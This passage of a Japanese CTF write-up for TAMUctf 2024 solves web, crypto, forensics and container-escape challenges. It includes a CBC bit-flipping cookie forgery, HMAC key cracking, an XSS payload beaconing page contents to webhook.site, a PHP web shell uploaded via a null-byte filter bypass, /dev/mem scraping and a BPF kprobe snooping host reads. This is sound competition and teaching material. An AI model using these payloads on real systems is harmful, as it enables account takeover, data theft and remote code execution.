      RecoveryMailer.recovery_email(params[:email]).deliver_now
      redirect_to forgot_password_path, notice: 'Password reset email sent'
    else
      redirect_to forgot_password_path, alert: 'You are not a registered user!'
    end

  end
end

"b8500763@gmail.com"@example.com (example.com は私の管理するドメイン名に置き換える)をパスワードリセットフォームに入力してみる。すると、25/tcpへの接続の試行があった。SMTPを喋ってみると、パスワードリセットのメールを受け取ることができた。このメールにフラグが含まれていた。

$ sudo nc -lvp 25
Listening on 0.0.0.0 25
Connection received on so254-9.mailgun.net 61175
220 … ESMTP
EHLO so254-9.mailgun.net
250 …
MAIL FROM:<bounce+433457.6673cb-"0b8500763@gmail.com"=…@fgpwmg.tamuctf.com>
250 sender <bounce+433457.6673cb-"0b8500763@gmail.com"=…@fgpwmg.tamuctf.com> ok
RCPT TO:<"0b8500763@gmail.com"@…>
250 recipient <"0b8500763@gmail.com"@…> ok
DATA
354 go ahead
…
Subject: Flag
From: ForgottenPassword@tamuctf.com
To: "0b8500763@gmail.com"@…
date: Sat, 06 Apr 2024 05:42:35 +0000
message-id: <6610e0cb16f28_2bd15000-4df@73e71080d4bd.mail>
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset=ascii

<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <style>
      /* Email styles need to be inline */
    </style>
  </head>

  <body>
    <h1> Here is the flag! </h1>

<p>gigem{sptfy.com/Qhnv}</p>

  </body>
</html>
.

gigem{sptfy.com/Qhnv}

[Web 191] Flipped (89 solves)

So many challenges have plaintext cookies. Try breaking my encrypted cookies!

(URL)

添付ファイルはないが、与えられたURLにアクセスすると次のようなソースコードが表示された。ランダムに生成された鍵でAES-CBCを使ってユーザ情報を暗号化し、Cookieに格納している。あるいは、Cookieに格納されているバイト列を復号してユーザ情報を取り出している。

デフォルトでは {"admin": 0, "username": "guest"} というユーザ情報が格納されているけれども、フラグを得るためにはこの admin というプロパティを 1 や true に変更する必要がある。

from os import environ
from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from flask import Flask, request, make_response, Response
from base64 import b64encode, b64decode

import sys
import json

FLAG = environ['FLAG']
PORT = int(environ['PORT'])

default_session = '{"admin": 0, "username": "guest"}'
key = get_random_bytes(AES.block_size)
app = Flask(__name__)


def encrypt(session):
    iv = get_random_bytes(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return b64encode(iv + cipher.encrypt(pad(session.encode('utf-8'), AES.block_size)))


def decrypt(session):
    raw = b64decode(session)
    cipher = AES.new(key, AES.MODE_CBC, raw[:AES.block_size])
    try:
        return unpad(cipher.decrypt(raw[AES.block_size:]), AES.block_size).decode()
    except Exception:
        return None


@app.route('/')
def index():
    session = request.cookies.get('session')
    if session == None:
        res = Response(open(__file__).read(), mimetype='text/plain')
        res.set_cookie('session', encrypt(default_session).decode())
        return res
    elif (plain_session := decrypt(session)) == default_session:
        return Response(open(__file__).read(), mimetype='text/plain')
    else:
        if plain_session != None:
            try:
                if json.loads(plain_session)['admin'] == True:
                    return FLAG
                else:
                    return 'You are not an administrator'
            except Exception:
                return 'You are not an administrator'
        else:
            return 'You are not an administrator'

if __name__ == '__main__':
    app.run('0.0.0.0', PORT)

username というプロパティは一切参照されていない。{"admin": 0, "username": "guest"} に対応する暗号文は得られるわけだから、改ざんによって作るユーザ情報は {"admin": 1} でも構わない。最初のブロック以外は削除し、IVをいじって {"admin": 1}\x04\x04\x04\x04 へ復号されるような暗号文を作ろう。

import base64
import httpx
from ptrlib import *
with httpx.Client(base_url='https://…/') as client:
    client.get('/')

    session = client.cookies['session']
    encrypted = base64.b64decode(session)
    iv = encrypted[:16]
    new_session = base64.b64encode(xor(
        xor(iv, b'{"admin": 0, "us'), b'{"admin": 1}\x04\x04\x04\x04'
    ) + encrypted[16:32]).decode()
    client.cookies['session'] = new_session

    print(client.get('/').text)

これを実行するとフラグが得られた。

gigem{verify_your_cookies}

[Web 388] Cracked (53 solves)

Well, I guess my crypto wasn't the best... This time I am using an HMAC to do integrity checking on the session. Good luck getting the flag now!

Note: This challenge is intended to be solved after Flipped, but it is not required.

(URL)

添付ファイルはないが、与えられたURLにアクセスすると次のようなソースコードが表示された。今度はCookieの session というキーにユーザ情報が、sig というキーにそのHMAC(HMAC-SHA1)が格納されている。もちろんこの sig は session が正しいかどうかの検証に用いられる。HMACの比較には == でなく hmac.compare_digest を使っているのでタイミング攻撃はダメそう。全体的にセキュアなコードに見える。

from os import environ
from hashlib import sha1
from flask import Flask, request, make_response, Response
from base64 import b64encode, b64decode

import hmac
import json


KEY = environ['KEY']
FLAG = environ['FLAG']
PORT = int(environ['PORT'])

default_session = '{"admin": 0, "username": "guest"}'
app = Flask(__name__)


def sign(m):
    return b64encode(hmac.new(KEY.encode(), m.encode(), sha1).digest()).decode()


def verify(m, s):
    return hmac.compare_digest(b64decode(sign(m)), b64decode(s))


@app.route('/')
def index():
    session = request.cookies.get('session')
    sig = request.cookies.get('sig')
    if session == None or sig == None:
        res = Response(open(__file__).read(), mimetype='text/plain')
        res.set_cookie('session', b64encode(default_session.encode()).decode())
        res.set_cookie('sig', sign(default_session))
        return res
    elif (plain_session := b64decode(session).decode()) == default_session:
        return Response(open(__file__).read(), mimetype='text/plain')
    else:
        if plain_session != None and verify(plain_session, sig) == True:
            try:
                if json.loads(plain_session)['admin'] == True:
                    return FLAG
                else:
                    return 'You are not an administrator'
            except Exception:
                return 'You are not an administrator'
        else:
            return 'You are not an administrator'

if __name__ == '__main__':
    app.run('0.0.0.0', PORT)

今度は KEY がランダムに生成されたものではなく環境変数由来であることに注目する。また、問題名も "Cracked" だ。簡単にクラックできるような鍵なのではないか。hashcatで殴ろう。hashcat.exe -m 150 -a 0 hash.txt rockyou.txt で、6lmao9 が鍵であるとわかった(ΦωΦ)

…
Host memory required for this attack: 667 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

beefda82f9ed4590ea38e9c5a4616397e19f9c74:{"admin": 0, "username": "guest"}:6lmao9
…

判明した鍵を使って {"admin": 1} に対応する sig を計算する。Cookieにそれぞれセットするとフラグが得られた。

gigem{maybe_pick_a_better_password_next_time}

[Web 440] Imposter (40 solves)

I'm not a big fan of Discord's new ToS changes, so I'm making my own crappy version of Discord that isn't overly invasive.

(URL)

与えられたURLにアクセスすると、次のようにログインフォームが表示された。

適当にユーザ登録してログインすると、次のようにDiscordのパチモンが表示された。最初からチャットの対象として admin#0000 というユーザがリストに存在している。

<s>test</s> と入力すると次の通り斜線が表示され、まずHTML Injectionがあるとわかる。<img src=x onerror="navigator.sendBeacon('…')"> と入力するとadmin botからアクセスがあった。XSSもあるようだ。

さて、この問題ではXSSで何をすればよいだろうか。クライアント側のコードを読むと、次のように /flag というメッセージを入力すると特殊な挙動をするとわかる。

      $('#message-box').keypress(function(e) {
        var code = e.keyCode || e.which;
        if(code == 13) {
          message = $('#message-box').val();
          if(message != '') {
            dst = document.getElementById('active-dm').name;
            $('#message-box').val('');
            if(message != '/flag') {
              socket.emit('json', {'to': dst, 'message': message, 'time': moment().format('h:mm:ss A')});
            } else {
              socket.emit('flag');
            }
          }
        }
      });

やってみると、admin#0000 しか /flag でフラグを閲覧できないと怒られる。

ならば、XSSで無理やり admin#0000 に /flag と送らせよう。<img src=x onerror="setTimeout(()=>{socket.emit('flag');setTimeout(()=>{navigator.sendBeacon('https://webhook.site/…',document.body.innerHTML)},500);},500)"> というメッセージを送る。すると、次のように /flag へのレスポンスとしてフラグが返っている様子が確認できた。

…
    <div class="container">
      <div id="chat" class="chat">
        <img src="x" onerror="setTimeout(()=>{socket.emit('flag');setTimeout(()=>{navigator.sendBeacon('https://webhook.site/…',document.body.innerHTML)},500);},500)">
      
        <div class="message">
            <span class="sender">System</span>
            <p>gigem{its_like_xss_but_with_extra_steps}</p>
        </div>
    </div>
…

gigem{its_like_xss_but_with_extra_steps}

[Web 454] Remote (35 solves)

I just released the newest version of my online image repository.

Patch notes:

• Added ability to upload via URL

Note: The flag is located in /var/www/.

(URL)

添付ファイル: remote.zip

与えられたURLにアクセスすると、次のように画像のアップロードフォームが表示される。適当な画像をアップロードしてやると、ページの下部にアップロードした画像が表示された。この画像は /index.php?file=6613d5693f0f59.39827636_fiqjnolhkpgme.jpeg のようなURLになっている。

このように直接画像をアップロードできる機能のほか、URLを指定してのアップロードもできるようだ。URLに htm, php, js, css といったものが含まれておらず、またURLとして正しければ、その内容を取ってくる。そのURLに. で区切った右側を拡張子として、ランダムなファイル名で保存する。このパスは uploads/(セッションID)/(ランダムなファイル名) というものになっている。

<?php
…
  } else if(isset($_REQUEST['url'])) {
    if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
      $url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
      if(filter_var($url, FILTER_VALIDATE_URL)) {
        $img = file_get_contents($url); 
        if($img !== false) {
          $mime = substr($url, strrpos($url, '.') + 1);
          $file = random_filename(32, 'uploads/' . $sess, $mime);
          
          $f = fopen('uploads/' . $sess . '/' . $file, "wb");
          if($f !== false) {
            fwrite($f, $img);
            fclose($f);
            header('Location: /index.php?message=Image uploaded successfully&status=success');
…

filter_var($url, FILTER_VALIDATE_URL) は file:///etc/passwd のようなものでも通してしまうので、このチェックはないものとして考えてよい。ただ、/(htm)|(php)|(js)|(css)/ というチェックはどうすれば通せるだろうか。よく見ると、この正規表現によるチェックの対象は $_REQUEST['url'] なのに対して、実際にコンテンツを取ってくるURLは FILTER_SANITIZE_URL を通したものになっている。順番が逆ではないか。

FILTER_SANITIZE_URL がどのようなものかPHPのドキュメントを参照すると「英字、数字および $-_.+!*'(),{}|\\^~[]`<>#%";/?:@&= 以外のすべての文字を取り除きます」とある。つまり、hoge.p(消される文字)hp のようにすると hoge.php になり、たとえ .php で終わっていてもダウンロードさせられるのではないか。

次のようにわざと p と hp の間にnull文字を入れる。これで /aaa.php にHTTPリクエストが送られ、.php で終わる <?php passthru($_GET['piyopiyo']); という内容のファイルを保存させることができた。

$ curl -c cookie.txt https://…
...
$ curl -c cookie.txt https://…/ -d "url=http://…/aaa.p%00hp" | grep -3 image-display
...
      <div class="result" id="result">
      </div>
    </form>
    <div class=image-display>
<a href=/index.php?file=te8wq2jvqvevph4zn6w9kvg61qilecs1.php><div class=card><img class=thumbnail src=/index.php?file=te8wq2jvqvevph4zn6w9kvg61qilecs1.php></div></a>    </div>
  </div>
</div>

さて、/index.php?file=te8wq2jvqvevph4zn6w9kvg61qilecs1.php にアクセスしてもPHPコードは実行されない。どうすればRCEに持ち込めるだろうか。アップロード先は uploads とされていたけれども、これはドキュメントルート下にある。つまり、index.php を通さずとも直接アクセス可能である。セッションIDはCookieからわかるし、実際のファイル名も .image-display 中の img の src 属性からわかる。完全なパスも推測可能だ。

このとき、セッションIDは 7e1345af2b56cf47d90b075f7a044a41 だった。アップロード先の /uploads/7e1345af2b56cf47d90b075f7a044a41/te8wq2jvqvevph4zn6w9kvg61qilecs1.php に直接アクセスすると、このPHPコードが実行された。そのままフラグを探すと、見つかった。

$ curl "https://…/uploads/7e1345af2b56cf47d90b075f7a044a41/te8wq2jvqvevph4zn6w9kvg61qilecs1.php?piyopiyo=ls+/tmp|grep+-v+sess"
flag-de88df3ebf2f0c4bf871ddfb2e0fcce4.txt
$ curl "https://…/uploads/7e1345af2b56cf47d90b075f7a044a41/te8wq2jvqvevph4zn6w9kvg61qilecs1.php?piyopiyo=cat+/tmp/flag-de88df3ebf2f0c4bf871ddfb2e0fcce4.txt"
gigem{new_features_means_new_opportunities}

gigem{new_features_means_new_opportunities}

[Cryptography 464] Jumbled (30 solves)

The RSA Public and Private keys are provided. However, the private key seems to be jumbled in a block size of 10 hex characters. Can you get the flag?

添付ファイル: jumbled.zip

添付ファイルを展開すると public, private, flag.txt.enc の3つのファイルが出てきた。private はこんな感じ。

49 45 4e 42 47 2d 2d 2d 2d 2d 20 54 4b 41 45 49 50 56 20 52 0a … 0d 33 32 65 4e 61 46 6a 61 6b 53 44 6c 54 61 49 4f 52 74 77 37 37 79 6f 64 6a 2d 2d 2d 2d 2d 0d 3d 0a 51 3d 41 49 54 52 56 20 4e 50 45 44 2d 2d 2d 2d 2d 45 20 59 45 4b

hexデコードをすると次のようなテキストが現れた。なるほど、問題文の通りぐちゃぐちゃになっている。

IENBG----- TKAEIPV R
-M-
-Y-E-DBAIAvIAIEGk9hikBqNgAFSEAA0QwBigAgSYBwCKQBCIAAEogA4P0hviZFqN8uoOx
N
Hktux20rj7PgiY+pd5tVkPD9tf+nw1fGyPwkomYXOrQ1YyotznX2pH
T6Lk6U/CkE3Z4S7
oPfVCQcZDzJcmbJ61kpMplvvd6xqDTl/jtnchYikNDIYdLyBAqSy
z
…
X/ILK+iDhwhqhsqsb5ERMzT6FBz+Ag+yPtwyRPK8rYvnV76CCW
epV
32eNaFjakSDlTaIORtw77yodj-----
=
Q=AITRV NPED-----E YEK

元のテキストは -----BEGIN PRIVATE KEY----- から始まるはずだ。10文字ごとに区切り*1、はじめの2ブロックについて、各文字が本来何文字目にあるべきかを確認する。なるほど、ブロックごとにその置換の方法は変わらないようだ。

86957?????
IENBG-----

8695731402
 TKAEIPV R

雑に、テキストを元に戻すスクリプトを書く。

import binascii
import io
with open('jumbled/private') as f:
    s = binascii.unhexlify(f.read().replace(' ', ''))

table = (8, 6, 9, 5, 7, 3, 1, 4, 0, 2)

res = b''
i = io.BytesIO(s)
while True:
    t = i.read(10)
    if t == b'':
        break
    for j in table:
        res += bytes([t[j]])
print(res.decode())

with open('private', 'wb') as f:
    f.write(res)

この秘密鍵を使って flag.txt.enc を復号できた。

$ openssl pkeyutl -decrypt -inkey private -in jumbled/flag.txt.enc
gigem{jumbl3d_r54_pr1v473_k3y_z93kd74lx}

gigem{jumbl3d_r54_pr1v473_k3y_z93kd74lx}

[Forensics 486] SMP (20 solves)

We'd call it Bedwars but we suck at Bedwars too much.

添付ファイル: smp.zip

添付ファイルを展開すると smp.log というファイルが出てきた。これは以下のようなテキストファイルで、24.7MBとかなり大きい。ログに含まれる "Move Entity PosRot" のような特徴的に思えるクエリで検索すると、どうやらSniffCraftというツールでMinecraftのパケットをキャプチャしたものらしいとわかった。

[0:00:00:005] [Handshake] [(SC) --> S] Client Intention
[0:00:00:005] [Handshake] [C --> (SC)] Client Intention
[0:00:00:005] [Login] [(SC) --> S] Hello
[0:00:00:005] [Login] [C --> (SC)] Hello
[0:00:00:358] [Login] [(SC) --> S] Key
[0:00:00:358] [Login] [S --> (SC)] Hello
[0:00:00:574] [Login] [S --> C] Login Compression
[0:00:00:574] [Login] [S --> C] Game Profile
[0:00:00:575] [Login] [C --> S] Login Acknowledged
…

このままだと扱いづらいので、無理やりJSONに変換する。

import json

with open('smp/smp.log') as f:
    s = f.read()
s = '\n' + s[:s.index('Sorted by count')]
i = 0

result = []
while i != -1:
    j = s.find('\n[', i + 1)
    t = s[i:j]

    first_line, *data = t.strip().split('\n', 1)
    timestamp = first_line[1:].split(']', 1)[0]
    is_server_to_client = 'S --> C' in first_line
    command = first_line.rsplit('] ', 1)[1]

    result.append({
        'command': command,
        'timestamp': timestamp,
        'isServerToClient': is_server_to_client,
        'data': None if len(data) == 0 else json.loads(data[0])
    })

    i = j

with open('smp.json', 'w') as f:
    json.dump(result, f)

ログの最後に統計情報が載っている。全部で何十万とパケットがある中で、サーバからクライアントに対して送られている "Block Update" というパケットは866個しかなく、またブロックの何かしらの情報を更新しているという点が気になった。x, y, zの座標の情報もこのパケットに含まれているので、プロットしてみたい。

…
| Update Recipes                                 |      1 ( 0.00%) |    22651 ( 0.22%) | 
| Forget Level Chunk                             |   1451 ( 0.73%) |    15961 ( 0.16%) | 
| Entity Event                                   |   1432 ( 0.72%) |    11456 ( 0.11%) | 
| Block Update                                   |    866 ( 0.44%) |    11027 ( 0.11%) | 
| Update Tags (Configuration)                    |      1 ( 0.00%) |     8517 ( 0.08%) | 
| Update Advancements                            |      1 ( 0.00%) |     7834 ( 0.08%) | 
| Commands                                       |      1 ( 0.00%) |     7797 ( 0.08%) | 
…

プロットするスクリプトを用意した。

import json
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D

with open('smp.json', 'r') as f:
    packets = json.load(f)

fig = plt.figure()
ax = fig.add_subplot(projection='3d')

x, y, z = [], [], []
for packet in packets:
    if packet['command'] != 'Block Update':
        continue
    pos = packet['data']['pos']
    x.append(pos['x'])
    y.append(pos['y'])
    z.append(pos['z'])

ax.scatter3D(x, y, z)

plt.show()

実行してぐるぐる回すと、次のようにフラグが現れた。

gigem{w3_L0v3_pL1y1n_MC_SMP}

[Forensics 486] MCFS (20 solves)

The size of a Minecraft world is 60,000,000 * 60,000,000 * 384 blocks. If 256 different blocks are chosen to represent a byte of data, this means that a Minecraft world could store roughly 1.2 exabytes of data. Naturally, this must mean that Minecraft is the best storage system in terms of capacity, so I have decided to start storing my files in my world. Have fun recovering them!

Note: The file size is 8MB

添付ファイル: mcfs.zip

添付ファイルを展開すると、Minecraftのワールドデータが格納されている world というディレクトリと、mcfs.jar とが出てきた。jadx-gui で mcfs.jar をデコンパイルする。一番重要なのは次のメソッドだ。このコマンドに第1引数として与えられたファイルを読み出して、一定間隔でワールドへブロックを設置している。設置されるブロックの種類はファイルの内容に基づいている。

    public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {
        if (args.length != 1) {
            return false;
        }
        ((Player) sender).getWorld().setGameRule(GameRule.DO_DAYLIGHT_CYCLE, false);
        ((Player) sender).getWorld().setGameRule(GameRule.RANDOM_TICK_SPEED, 0);
        Hashtable<Integer, Tag<Material>> tagBlacklist = new Hashtable<>();
        tagBlacklist.put(1, Tag.ENDERMAN_HOLDABLE);
        tagBlacklist.put(2, Tag.BAMBOO_PLANTABLE_ON);
        tagBlacklist.put(4, Tag.SNOW);
        Hashtable<Integer, Material> materialHashMap = new Hashtable<>();
        Iterator<Material> materials = Arrays.stream(Material.values()).iterator();
        int i = 0;
        while (materialHashMap.size() < 256 && materials.hasNext()) {
            Material material = materials.next();
            if (material.isSolid() && !material.hasGravity() && !material.isInteractable() && !material.equals(Material.FARMLAND) && !isTagged(tagBlacklist, material)) {
                materialHashMap.put(Integer.valueOf(i), material);
                i++;
            }
        }
        byte[] fileBytes = new byte[0];
        try {
            fileBytes = Files.readAllBytes(Paths.get(args[0], new String[0]));
        } catch (IOException e) {
            e.printStackTrace();
        }
        int byteIndex = 0;
        int row = 0;
        while (true) {
            for (int x = 0; x < 256; x++) {
                for (int y = 0; y < 256; y++) {
                    for (int z = 0; z < 16; z++) {
                        try {
                            if (byteIndex > fileBytes.length - 1) {
                                return true;
                            }
                            ((Player) sender).getWorld().getBlockAt(0 + x, CHUNKHEIGHT - y, 0 + (16 * row) + z).setType(materialHashMap.get(Integer.valueOf(Byte.toUnsignedInt(fileBytes[byteIndex]))));
                            byteIndex++;
                        } catch (Exception e2) {
                            e2.printStackTrace();
                            return true;
                        }
                    }
                }
            }
            row++;
        }
    }

添付されたワールドに設置されているブロックをもとに、書き込まれたファイルを復元するBukkitプラグインを作ろう。以下のようなコードができあがる。

package com.example.testplugin;

import org.bukkit.plugin.java.JavaPlugin;

import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.util.Arrays;
import java.util.Enumeration;
import java.util.List;
import java.util.Hashtable;
import java.util.Iterator;

import org.bukkit.Bukkit;
import org.bukkit.GameRule;
import org.bukkit.Material;
import org.bukkit.Server;
import org.bukkit.Tag;
import org.bukkit.World;

public final class Testplugin extends JavaPlugin {
    public static final int CHUNKSIZE = 16;
    public static final int CHUNKHEIGHT = 256;
    public static final int BLOCKLEN = 16;
    public static final int X = 0;
    public static final int Z = 0;

    @Override
    public void onEnable() {
        Server server = Bukkit.getServer();
        List<World> worlds = server.getWorlds();
        getLogger().info("worlds size " + worlds.size());
        World world = worlds.get(0);

        world.setGameRule(GameRule.DO_DAYLIGHT_CYCLE, false);
        world.setGameRule(GameRule.RANDOM_TICK_SPEED, 0);

        Hashtable<Integer, Tag<Material>> tagBlacklist = new Hashtable<>();
        tagBlacklist.put(1, Tag.ENDERMAN_HOLDABLE);
        tagBlacklist.put(2, Tag.BAMBOO_PLANTABLE_ON);
        tagBlacklist.put(4, Tag.SNOW);
        Hashtable<Material, Integer> materialHashMap = new Hashtable<>();
        Iterator<Material> materials = Arrays.stream(Material.values()).iterator();

        int i = 0;
        while (materialHashMap.size() < 256 && materials.hasNext()) {
            Material material = materials.next();
            if (material.isSolid() && !material.hasGravity() && !material.isInteractable() && !material.equals(Material.FARMLAND) && !isTagged(tagBlacklist, material)) {
                materialHashMap.put(material, Integer.valueOf(i));
                i++;
            }
        }

        int row = 0;

        BufferedOutputStream file;
        try {
            file = new BufferedOutputStream(new FileOutputStream("../test.bin"));
        } catch (Exception e2) {
            e2.printStackTrace();
            return;
        }

        getLogger().info("start");
        while (true) {
            for (int x = 0; x < 256; x++) {
                for (int y = 0; y < 256; y++) {
                    for (int z = 0; z < 16; z++) {
                        try {
                            Material type = world.getBlockAt(0 + x, CHUNKHEIGHT - y, 0 + (16 * row) + z).getType();
                            Integer byte_ = materialHashMap.getOrDefault(type, 0);
                            file.write(byte_ & 0xFF);
                        } catch (Exception e2) {
                            e2.printStackTrace();
                            return;
                        }
                    }
                }
            }

            row++;
            if (row > 100) {
                break;
            }
        }

        try {
            file.close();
        } catch (Exception e2) {
            e2.printStackTrace();
            return;
        }

        getLogger().info("done");
    }

    private boolean isTagged(Hashtable<Integer, Tag<Material>> blacklist, Material material) {
        Enumeration<Integer> e = blacklist.keys();
        while (e.hasMoreElements()) {
            int key = e.nextElement().intValue();
            if (blacklist.get(Integer.valueOf(key)).isTagged(material)) {
                return true;
            }
        }
        return false;
    }
}

出来上がったプラグインを java -Xms1G -Xmx4G -jar spigot-1.20.4.jar nogui -P ../mcfs/test-mod/testplugin/target/ のようにして読み込む。無事にファイルの抽出ができたようだ。

…
[06:01:45] [Server thread/INFO]: [testplugin] Enabling testplugin v1.0-SNAPSHOT
[06:01:45] [Server thread/INFO]: [testplugin] worlds size 3
[06:01:45] [Server thread/INFO]: [testplugin] start
[06:02:42] [Server thread/INFO]: [testplugin] done
…

どうやらext4のファイルシステムらしい。

$ file test.bin
test.bin: Linux rev 1.0 ext4 filesystem data, UUID=95d1e1d8-3450-4c20-a97f-c1ca7da5d292 (extents) (64bit) (large files) (huge files)

FTK Imagerで開き、これに含まれていた flag.tar.gz を取り出す。これにフラグが含まれていた。

gigem{r3curs1v3_f1l3_st0rag3}

[Misc 499] Scavenging (7 solves)

Look around, see what you can find!

Note: File uploads for this challenge are not necessary; you can complete it with the binaries provided.

openssl s_client -connect tamuctf.com:443 -servername scavenging

問題サーバに接続すると、次のようなシェルスクリプトが出力された後にシェルが立ち上がった。なるほど、この外側に出ればよいらしい。

#!/bin/sh

ls -alh /init
cat /init

mount -t ramfs -o size=32m ramfs /mnt
cp -ra /inner/* /mnt/

exec switch_root /mnt /bin/sh

私が問題を見た時点で、pr0xyさんによって mount -t proc none /proc/ でprocfsがマウントできるとわかっていた。procfsから何かしらの情報が得られないか見ていると、ls -la /proc/*/root/ をしたときになぜかPIDが 18 のプロセスでは /dev/ を指していることがわかった。

~ # ls -la /proc/18/root/
ls -la /proc/18/root/
total 0
drwxr-xr-x    7 0        0             2260 Apr  6 22:46 .
drwxr-xr-x    7 0        0             2260 Apr  6 22:46 ..
crw-r--r--    1 0        0          10, 235 Apr  6 22:46 autofs
drwxr-xr-x    2 0        0               60 Apr  6 22:46 bsg
crw-------    1 0        0           5,   1 Apr  6 22:46 console
drwxr-xr-x    3 0        0               60 Apr  6 22:46 cpu
crw-------    1 0        0          10, 126 Apr  6 22:46 cpu_dma_latency
crw-rw-rw-    1 0        0           1,   7 Apr  6 22:46 full
…

この中には mem も含まれている。ramfsらしいので /dev/mem にフラグが載っていないかと考えた。安直だと思いつつやってみると、フラグが得られてしまった。

~ # mount -t proc none /proc/
~ # mkdir /tmp
~ # dd if=/proc/18/root/mem of=/tmp/poyo bs=1 skip=$((0x6000000)) count=$((0x10000000))
~ # cd /tmp
/tmp # strings -n 8 poyo | grep "gigem"
gigem{now_where_did_that_come_from_exactly}

gigem{now_where_did_that_come_from_exactly}

[Misc 499] Over The Shoulder (7 solves)

You are given a shell inside a docker container. The host running docker does cat /home/user/flag.txt once per minute. Read the flag.

openssl s_client -connect tamuctf.com:443 -servername over-the-shoulder

問題サーバに接続するとシェルが立ち上がった。問題文からコンテナエスケープ問だとわかる。まず環境を確認すると、どうやらAlpine Linux 3.19らしいとわかった。

$ uname -a
Linux 6f796d151145 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar  6 19:35:04 UTC 2024 x86_64 Linux
$ cat /etc/os-release
NAME="Alpine Linux"
ID=alpine
VERSION_ID=3.19.1
PRETTY_NAME="Alpine Linux v3.19"
HOME_URL="https://alpinelinux.org/"
BUG_REPORT_URL="https://gitlab.alpinelinux.org/alpine/aports/-/issues"

pr0xyさんがScavengingで試されていた方法を見つつ、付与されているcapabilityを見ていく。色々あるけれども cap_perfmon と cap_bpf が気になった。

問題文では cat /home/user/flag.txt がホスト側で定期的に実行されていると言っているけれども、もっと派手なエスケープができる(つまり、ホスト側でシェルを奪える)のであればわざわざそんなことを言う必要がない。その情報に関連することができるのではないか、たとえばBPFプログラムでカーネルでの処理にフックして、cat /home/user/flag.txt で読み出されている内容を盗み取ることができるのではないかと考えた。

$ grep Cap /proc/1/status
CapInh: 0000000000000000
CapPrm: 000000c0a80425fb
CapEff: 000000c0a80425fb
CapBnd: 000000c0a80425fb
CapAmb: 0000000000000000
$ capsh --decode=000000c0a80425fb
0x000000c0a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap,cap_perfmon,cap_bpf

別途、手元での検証やBPFを使ったプログラムのビルド用にAlpine Linuxの環境を用意する。適当に masmullin2000/libbpf-sample をベースとしつつ書いていく。並行してコンテナエスケープの色々な資料を読んでいると、kprobeで vfs_read にフックする手法を見つけた。これをやってみよう。

コードは次の通り。

~/libbpf-sample/c/simple # cat exec.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>

#include "exec.skel.h"

int main(void)
{
    struct exec *skel = exec__open_and_load();
    exec__attach(skel);

    for(;;) {
    }
    return 0;
}
~/libbpf-sample/c/simple # cat exec.bpf.c
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

SEC("kprobe/vfs_read")
int BPF_KPROBE(struct pt_regs *ctx, struct file *fd, const char *buf, size_t count)
{
    char s[128];
    bpf_probe_read(s, 128, (void *)ctx->r13);
    bpf_printk("vfs_read %s\n", s);
    return 0;
}

char LICENSE[] SEC("license") = "neko";

これをビルドする。問題サーバの環境ではネットワークへの接続ができないために、できあがったバイナリや共有ライブラリを .tar.gz に固め、Base64エンコードして問題サーバの環境へ持っていく*2。このバイナリを実行しつつ、/sys/kernel/tracing/trace_pipe から bpf_printk の出力を見る。

touch a.txt
# base64 -w900 a.tar.gz | xargs -i echo 'echo "{}" >> a.txt' > tmp.txt でtmp.txtに出力されたコマンドを実行。a.txtにBase64エンコードされた.tar.gzを書き込む
base64 -d a.txt > a.tar.gz
tar zxvf a.tar.gz
mv usr/lib/libbpf.so.1.3.0 /usr/lib/libbpf.so.1
mv usr/lib/libelf-0.190.so /usr/lib/libelf.so.1
mv usr/lib/libzstd.so.1.5.5 /usr/lib/libzstd.so.1

echo 'r:vfs_read vfs_read' >> /sys/kernel/tracing/kprobe_events
./exec &
grep cat /sys/kernel/tracing/trace_pipe &

しばらく待つと、フラグが出力された。

tk: vfs_read
            grep-1086    [000] ...21   131.003332: bpf_trace_printk: vfs_read             grep-1086    [000] ...21   131.003324: bpf_trace_printk: vfs_read            socat-1047    [000] ...21   131.001301:
            grep-1086    [000] ...21   131.003333: bpf_trace_printk: vfs_read             grep-1086    [000] ...21   131.003324: bpf_trace_printk: vfs_read            socat-1047    [000] ...21   131.001301:
           socat-1047    [000] ...21   131.004301: bpf_trace_printk: vfs_read
             cat-1108    [000] ...21   130.989598: bpf_trace_printk: vfs_read gigem{this_aint_your_mamas_shoulder_surfing}
           socat-1047    [000] ...21   131.004301: bpf_trace_printk: vfs_read
             cat-1108    [000] ...21   130.989598: bpf_trace_printk: vfs_read gigem{this_aint_your_mamas_shoulder_surfing}
            grep-1086    [000] ...21   131.006318: bpf_trace_printk: vfs_read            socat-1047    [000] ...21   131.004301: bpf_trace_printk: vfs_read
             cat-1108    [000] ...21   130.989598

gigem{this_aint_your_mamas_shoulder_surfing}